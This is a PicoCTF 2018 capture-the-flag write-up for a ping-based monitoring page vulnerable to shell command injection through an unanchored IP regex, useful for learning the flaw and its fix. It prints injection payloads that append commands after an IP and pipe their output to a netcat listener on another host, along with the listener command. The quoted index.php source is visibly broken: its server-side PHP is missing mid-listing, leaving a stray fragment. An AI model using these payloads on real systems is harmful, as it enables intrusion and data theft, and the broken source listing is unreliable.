# PicoCTF 2018: fancy-alive-monitoring
***Category: category***
>*One of my schoolmates developed an alive monitoring tool. Can you get a flag from http://2018shell2.picoctf.com:43316?*
## Solution

For this challenge, we are given a site which checks if an IP is alive or not, along with the page's source code:
```php
<html>
<head>
<title>Monitoring Tool</title>
<script>
function check(){
ip = document.getElementById("ip").value;
chk = ip.match(/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/);
if (!chk) {
alert("Wrong IP format.");
return false;
} else {
document.getElementById("monitor").submit();
}
}
</script>
</head>
<body>
<h1>Monitoring Tool ver 0.1</h1>
<form id="monitor" action="index.php" method="post" onsubmit="return false;">

Input IP address of the target host
<input id="ip" name="ip" type="text">


<input type="button" value="Go!" onclick="check()">
</form>
<hr>

Target is NOT alive.</h3>");
break;
} else if (strpos($str, ', 0% packet loss') !== false){
printf("<h3>Target is alive.</h3>");
break;
}
}
} else {
echo "Wrong IP Format.";
}
}
?>
<hr>
index.php source code
</body>
</html>
```

As I read through the source code, I noticed there were two checks: one client-side and one server-side.
The client-side check can be circumvented by sending the request through Burp Suite.
The server-side check, on the other hand, is where the vulnerability is. I noticed the server-side regex was missing an end-of-string anchor. If you pass the server-side check, the script executes the following command, with the user-supplied `$ip` concatenated straight into the shell string:
```php
exec('ping -c 1 '.$ip, $cmd_result);
```
Although the expression looks complicated, it's really just there to distract you so you won't notice the missing anchor. The expression is a chain of alternations (`|`), so it still matches any valid IP. Since there is no end-of-string anchor, anything appended after a valid IP passes the check, so you can add extra shell code and the server will execute it. To do this, just separate the code with a semicolon. However, the website will only print `Target is NOT alive.` or `Target is alive.`, so you will have to find some other way to get the output of the injected code.
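To make the defect concrete, here is an added example (not the challenge's own code) that puts a simplified stand-in for the unanchored check beside a hardened version of the same validation. The challenge's real regex is not reproduced; `$weak` is an assumed pattern that shares only the relevant property, a `^` anchor with no `$`.

```php
<?php
// Added example, not from the challenge. $weak is an assumed stand-in for the
// server-side regex: it anchors the start of the string but not the end.
function weakCheck(string $ip): bool {
    $weak = '/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})/';
    // A trailing ";cmd" is simply never examined, so it passes.
    return preg_match($weak, $ip) === 1;
}

function strictCheck(string $ip): bool {
    // filter_var only accepts a string that is exactly one IPv4 address,
    // so any trailing characters make it fail outright.
    return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false;
}

// Build the command only after validation, and quote the argument anyway so a
// future validator bug cannot turn the value into a second shell command.
function buildPingCommand(string $ip): ?string {
    if (!strictCheck($ip)) {
        return null;
    }
    return 'ping -c 1 ' . escapeshellarg($ip);
}

// Constructed inputs: a plain address and the injection shape from the writeup.
$inputs = ['1.1.1.1', '1.1.1.1;ls'];
foreach ($inputs as $in) {
    printf("%-12s weak=%s strict=%s cmd=%s\n",
        $in,
        weakCheck($in) ? 'pass' : 'fail',
        strictCheck($in) ? 'pass' : 'fail',
        buildPingCommand($in) ?? '(rejected)');
}
```

Run with `php example.php`: the first input passes both checks and yields `ping -c 1 '1.1.1.1'`, while `1.1.1.1;ls` passes only the weak check and is rejected by the strict one, which is the whole difference a `$` anchor (or `FILTER_VALIDATE_IP`) makes.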

To solve the challenge, you can set up a listener on the picoCTF shell on any unused port, like so:
```sh
nc -lvnp 7777
```
Once the listener is up, you can send the request through Burp Suite and pipe the output of the injected command to the listener. To find the shell's IP address, run `ifconfig` there. If you send the following in the body of your POST request:
```
ip=1.1.1.1;ls | nc 172.31.32.197 7777
```
You'll get:
```
index.php
index.txt
the-secret-1045-flag.txt
xinet_startup.sh
```
Set up the listener again and read the contents of `the-secret-1045-flag.txt` with this request:
```
ip=1.1.1.1;cat the-secret-1045-flag.txt | nc 172.31.32.197 7777
```
And it will give you the flag.

***Flag: `picoCTF{n3v3r_trust_a_b0x_c4a9b715}`***

Original writeup (https://github.com/scai16/CTF/tree/master/2018/PicoCTF%202018/fancy-alive-monitoring).